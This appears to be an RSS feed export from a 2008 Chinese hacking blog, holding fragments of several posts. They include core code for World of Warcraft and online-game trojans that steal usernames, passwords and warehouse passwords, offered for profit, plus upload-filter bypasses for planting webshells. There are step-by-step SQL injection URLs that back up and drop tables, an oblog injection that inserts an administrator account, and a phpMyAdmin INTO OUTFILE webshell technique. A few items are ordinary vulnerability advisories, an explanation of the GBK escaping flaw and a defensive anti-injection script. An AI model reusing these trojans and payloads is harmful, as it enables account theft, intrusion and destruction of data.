http://www.xkww.com/ zh LBS v2.0.313 Tue, 07 Oct 2008 08:02:50 +0800 60 ]]> Thu, 18 Sep 2008 10:33:35 +0800 信息来源：邪恶八进制

对应游戏版本v2.4.3.8606。这个只是核心代码，而非完整代码，通过调式完全可以写出美服跟欧服的WOW马来，大家发财去吧

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
; Programmed by asm, MSN:asm32@live.cn ;
; WOWGameMaker For WOW_MF_OF ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]]> ]]> Thu, 18 Sep 2008 10:33:12 +0800 文章作者：认真的雪

我也来凑凑热闹.....
发一个网游木马核心代码...无聊的时候写的..
截取了用户名，密码，等级，仓库密码

#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};

BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
]]> ]]> Fri, 12 Sep 2008 11:24:32 +0800
2.就是在上传时在后缀后面加空格或者加几点，也许也会有惊奇的发现。例：*.asp ,*.asp..。

3.利用双重扩展名上传例如：*.jpg.asa格式(也可以配上第二点一起利用)。

4.gif文件头欺骗，gif89a文件头检测是指程序为了他人将asp等文件后缀改为gif后上传,读取gif文件头,检测是否有gif87a或gif89a标记,是就允许上传,不是就说明不是gif文件。 而欺骗刚好是利用检测这两个标记,只要在木马代码前加gif87a就能骗过去。]]> ]]> Fri, 12 Sep 2008 11:08:35 +0800 http://www.sb.com/test.asp&#39;;alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

第二步：
http://www.sb.com/test.asp&#39;;declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步
http://www.sb.com/test.asp&#39;;drop/**/table/**/[itpro]--

第四步
http://www.sb.com/test.asp&#39;;crea]]> ]]> Fri, 12 Sep 2008 11:07:22 +0800 2、发布一篇日志，日志标题：测试一下
3、个人前台首页找到日志"测试一下"，点"推荐"
4、个人后台管理，选择"常用"选项中的"推荐日志"，然后点"测试一下"日志后面的修改，把摘要内容修改成：s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--
5、最后点"确认提交"按钮，如果提示修改成功，注入完成！
6、登录后台，地址/admin/admin_login.asp，输入上面的用户名和密码，登录后台成功！]]> ]]> Fri, 12 Sep 2008 11:04:28 +0800 这次是利用phpMyAdmin（哈哈，帐号密码我记下了！）

首先：
create database joyuan; /* 建立数据库joyuan */
use joyuan; /* 连接joyuan数据库 */
create table shell(code text); /* 建立表shell字段code文本型数据text */

然后：
insert into shell(code) /* 插入数据到shell表中的code字段 */
values ('shell代码'); /* 值为shell代码 我用PHP一句话，看后面*/
select * into outfile '/home/www/htdocs/server.php' from shell;
/* 将shell表中的内容输出保存为文件(输出到web目录下，要不就无法]]> ]]> Fri, 29 Aug 2008 14:13:45 +0800 影响版本:

SmartISoft phpBazar 2.0.2

描述:
BUGTRAQ ID: 30773
CNCAN ID：CNCAN-2008082206

phpBazar是一款基于PHP的WEB应用程序。
phpBazar不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息或操作数据库。
问题是脚本对用户提交的’adid’参数缺少过滤，提交恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。
<* 参考

http://www.securityfocus.com/bid/30773

*>
SEBUG安全建议:

目前没有解决方案提供：
http://www.smartisoft.com/
]]> ]]> Fri, 29 Aug 2008 14:13:10 +0800
漏洞厂商：http://www.dedecms.com

漏洞来源：http://www.80sec.com/release/dedecms-sql-injection.txt
]]> ]]> Fri, 29 Aug 2008 14:10:56 +0800
其实这东西国内少数黑客早已知道，只不过没有共享公布而已。有些人是不愿共享，宁愿烂在地里，另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时，0xbf27本身不是一个有效的GBK字符，但经过 addslashes() 转换后

变为0xbf5c27，前面的0xbf5c是个有效的GBK字符，所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理，结果漏洞就触

发了。

mysql_real_escape_string() 也存在相同的问题，只不过相比 addslashes() 它考虑到了用什么字符集来处理，因此可以用相

应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。

方法一：

改变mysql配置文件my.cnf
]]> ]]> Mon, 04 Aug 2008 14:08:56 +0800
上次发布的版本是：2006年10月12日

原本不打算再更新了，不过最近又有朋友问起了，在测试中确实又发现了一些问题，亲自帮助一个朋友安装调试也发现了一些问题，索性花了点时间修补了下Bug。功能上没有改变，仅仅修补安装时候可能出现的一个bug：
引用
Option Explicit选项打开系统无法正常使用的bug，并且优化了变量定义，防止与用户系统变量重复。
提供一些安装的建议：
1.就是调用主文件的时候，最好采用绝对路径调用，防止因路径问题引起一些不必要的麻烦。
如：
<!--#include virtual="/Neeao.com/Neeao_SqlIn.Asp"-->
2.安装的时候，最好能在文件头部调用，有时候可能有些程序在调用数据库连接文件的时候，并不是在头部，如：
]]>